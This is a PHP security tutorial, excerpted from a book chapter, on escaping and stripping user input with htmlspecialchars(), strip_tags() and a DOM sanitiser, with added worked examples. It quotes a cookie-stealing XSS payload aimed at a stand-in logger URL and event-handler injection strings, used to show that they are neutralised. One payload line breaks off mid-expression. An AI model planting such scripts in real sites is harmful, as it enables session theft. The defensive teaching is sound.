
Secure Encrypting and Decrypting for Your PHP Website

In this conclusion to a three-part series on secure PHP programming, you'll learn how to validate inputs, handle hashing, use the MCrypt package, and more. This article is excerpted from chapter 21 of the book Beginning PHP and Oracle: From Novice to Professional, written by W. Jason Gilmore and Bob Bryla (Apress; ISBN: 1590597702).

  1. Secure Encrypting and Decrypting for Your PHP Website
  2. Taking Advantage of PEAR: Validate
  3. Data Encryption
  4. The MCrypt Package
By: Apress Publishing
August 26, 2010




Converting Input into HTML Entities

The htmlentities() function converts characters that have special meaning in an HTML context into entity references, so that a browser renders them as literal text rather than interpreting them as markup. Its prototype follows:

string htmlentities(string input [, int quote_style [, string charset]])

Five characters in particular are considered special. They are the only ones converted by the related htmlspecialchars() function; htmlentities() converts these five plus every other character that has a named entity in the given charset:

  1. & will be translated to &amp;
  2. " will be translated to &quot; (unless quote_style is set to ENT_NOQUOTES)
  3. > will be translated to &gt;
  4. < will be translated to &lt;
  5. ' will be translated to &#039; (only when quote_style is set to ENT_QUOTES)

Pass ENT_QUOTES and an explicit charset (for example 'UTF-8') rather than relying on the defaults: before PHP 8.1 the default quote_style is ENT_COMPAT, which leaves the single quote untouched and so leaves a single-quoted attribute value open to injection.

Returning to the cross-site scripting example, if the user's input is passed through htmlspecialchars() rather than embedded into the page and executed as JavaScript, the input would instead be displayed exactly as entered, because it would be translated like so:

document.location ='http://www.example.org/logger.php?cookie=' +
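The following is an added example and not code from the book. It shows the cookie-logging payload being neutralised by htmlspecialchars(), why the quote_style matters when the value lands inside an attribute, and how htmlentities() differs from htmlspecialchars(). The helper name e() and the sample inputs are chosen here for illustration; the code assumes PHP 7 or later.

```php
<?php
// Added example, not code from the book: escaping untrusted input with
// htmlspecialchars() before it is placed in HTML text or attribute values.
// The helper e() and the sample strings are made up for this illustration.

declare(strict_types=1);

/**
 * Escape a string for insertion into HTML text or a quoted attribute value.
 * ENT_QUOTES converts both " and '; ENT_SUBSTITUTE replaces invalid UTF-8
 * sequences instead of returning an empty string; the charset is explicit so
 * the result does not depend on php.ini or PHP-version defaults.
 */
function e(string $untrusted): string
{
    return htmlspecialchars($untrusted, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed attacker input: the cookie-logging script from the chapter's
// cross-site scripting example, as a user might submit it in a form field.
$payload = "<script>document.location='http://www.example.org/logger.php?cookie='"
         . " + document.cookie</script>";

// Vulnerable: the payload is concatenated verbatim, so the browser executes it.
$vulnerable = '<p>Your comment: ' . $payload . '</p>';

// Hardened: the browser shows the script source as text.
$safe = '<p>Your comment: ' . e($payload) . '</p>';
assert($safe === '<p>Your comment: &lt;script&gt;document.location=&#039;http://www.example.org/logger.php?cookie=&#039; + document.cookie&lt;/script&gt;</p>');

// quote_style matters in attribute context. With ENT_NOQUOTES the double
// quote survives and this input closes the value attribute and adds its own.
$attr = '" onfocus="alert(document.cookie)" x="';
$broken = '<input value="' . htmlspecialchars($attr, ENT_NOQUOTES, 'UTF-8') . '">';
assert($broken === '<input value="" onfocus="alert(document.cookie)" x="">');

$fixed = '<input value="' . e($attr) . '">';
assert($fixed === '<input value="&quot; onfocus=&quot;alert(document.cookie)&quot; x=&quot;">');

// htmlentities() converts every character that has a named entity, not only
// the five special ones; htmlspecialchars() leaves other characters alone.
assert(htmlentities('café', ENT_QUOTES, 'UTF-8') === 'caf&eacute;');
assert(htmlspecialchars('café', ENT_QUOTES, 'UTF-8') === 'café');

echo $safe, "\n", $fixed, "\n";
```

Escaping must happen at output time, for the context the value is going into: the same e() helper is correct for element text and double-quoted attribute values, but not for data placed inside a script block, a URL, or a CSS property, which each need their own encoding.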

Stripping Tags from User Input

Sometimes it is best to completely strip user input of all HTML input, regardless of intent. For instance, HTML-based input can be particularly problematic when the information is displayed back to the browser, as is the case of a message board. The introduction of HTML tags into a message board could alter the display of the page, causing it to be displayed incorrectly or not at all. This problem can be eliminated by passing the user input through strip_tags() , which removes all HTML tags from a string. Its prototype follows:

string strip_tags(string str [, string allowed_tags])

The input parameter str is the string that will be examined for tags, while the optional input parameter allowed_tags specifies any tags that you would like to be allowed in the string. For example, italic tags ( <i></i> ) might be allowable, but table tags such as <td></td> could potentially wreak havoc on a page. Note that strip_tags() does not modify the attributes of the tags you allow, so an allowed <i> can still carry a style or onmouseover attribute; an allow-list of tags is therefore not, by itself, a defense against script injection. An example follows:

$input = "I <td>really</td> love <i>PHP</i>!";
$input = strip_tags($input,"<i></i>");
// $input now equals "I really love <i>PHP</i>!"
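The following is an added example, not code from the book. It reproduces the strip_tags() allow-list above on a post whose allowed <i> tag carries an event-handler attribute, shows that the attribute survives strip_tags(), and then sanitises the same post with a small DOM-based allow-list that also drops attributes. The functions sanitizeHtml() and cleanNode() and the sample post are made up here; the code assumes PHP 7 or later with the dom extension.

```php
<?php
// Added example, not code from the book: strip_tags() with an allow-list, why
// it is not sufficient on its own, and a DOM-based sanitiser that keeps the
// allowed tags but drops every attribute. sanitizeHtml(), cleanNode() and the
// sample post are made up for this illustration.

declare(strict_types=1);

// Constructed message-board post: a stray table cell plus an allowed <i>
// tag that carries an event-handler attribute.
$post = 'I <td>really</td> love <i onmouseover="alert(document.cookie)">PHP</i>!';

// strip_tags() removes <td> but leaves the allowed <i> untouched, attributes
// included, so the onmouseover handler still reaches the browser.
$stripped = strip_tags($post, '<i><b>');
assert($stripped === 'I really love <i onmouseover="alert(document.cookie)">PHP</i>!');

const DROP_WITH_CONTENT = ['script', 'style'];

/**
 * Walk $parent's children: drop script/style entirely, strip all attributes
 * from allowed elements, unwrap disallowed elements (their cleaned children
 * are kept), and remove comments and other non-text nodes.
 */
function cleanNode(DOMNode $parent, array $allowed): void
{
    // Snapshot the child list: the tree is modified while we walk it.
    foreach (iterator_to_array($parent->childNodes, false) as $child) {
        if ($child instanceof DOMElement) {
            $tag = strtolower($child->tagName);
            if (in_array($tag, DROP_WITH_CONTENT, true)) {
                $parent->removeChild($child);
                continue;
            }
            cleanNode($child, $allowed);            // clean descendants first
            if (in_array($tag, $allowed, true)) {
                // Allowed element: keep the tag, drop style, on*, href, ... attributes.
                foreach (iterator_to_array($child->attributes, false) as $attr) {
                    $child->removeAttributeNode($attr);
                }
            } else {
                // Disallowed element: unwrap it, keeping its already cleaned children.
                while ($child->firstChild !== null) {
                    $parent->insertBefore($child->firstChild, $child);
                }
                $parent->removeChild($child);
            }
        } elseif (!($child instanceof DOMText)) {
            $parent->removeChild($child);           // comments, PIs, CDATA: drop
        }
    }
}

function sanitizeHtml(string $fragment, array $allowed): string
{
    $doc = new DOMDocument();
    $previous = libxml_use_internal_errors(true); // malformed input must not emit warnings
    // The <?xml encoding?> prefix is the usual libxml idiom for forcing UTF-8 on
    // an HTML fragment; the explicit <body> wrapper stops libxml from implying
    // a <p> around bare text.
    $doc->loadHTML('<?xml encoding="UTF-8"><body>' . $fragment . '</body>');
    libxml_clear_errors();
    libxml_use_internal_errors($previous);

    $body = $doc->getElementsByTagName('body')->item(0);
    if ($body === null) {
        return '';
    }
    cleanNode($body, array_map('strtolower', $allowed));

    $out = '';
    foreach ($body->childNodes as $child) {
        $out .= $doc->saveHTML($child);             // re-escapes < > & in text nodes
    }
    return $out;
}

$clean = sanitizeHtml($post, ['i', 'b']);
assert($clean === 'I really love <i>PHP</i>!');
echo $clean, "\n";
```

When no markup at all is wanted, strip_tags() with no allowed_tags followed by htmlspecialchars() at output time is simpler and adequate; the DOM approach is for the case where a handful of formatting tags must be preserved, because only a real parser can reliably separate the tag from whatever attributes were attached to it.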
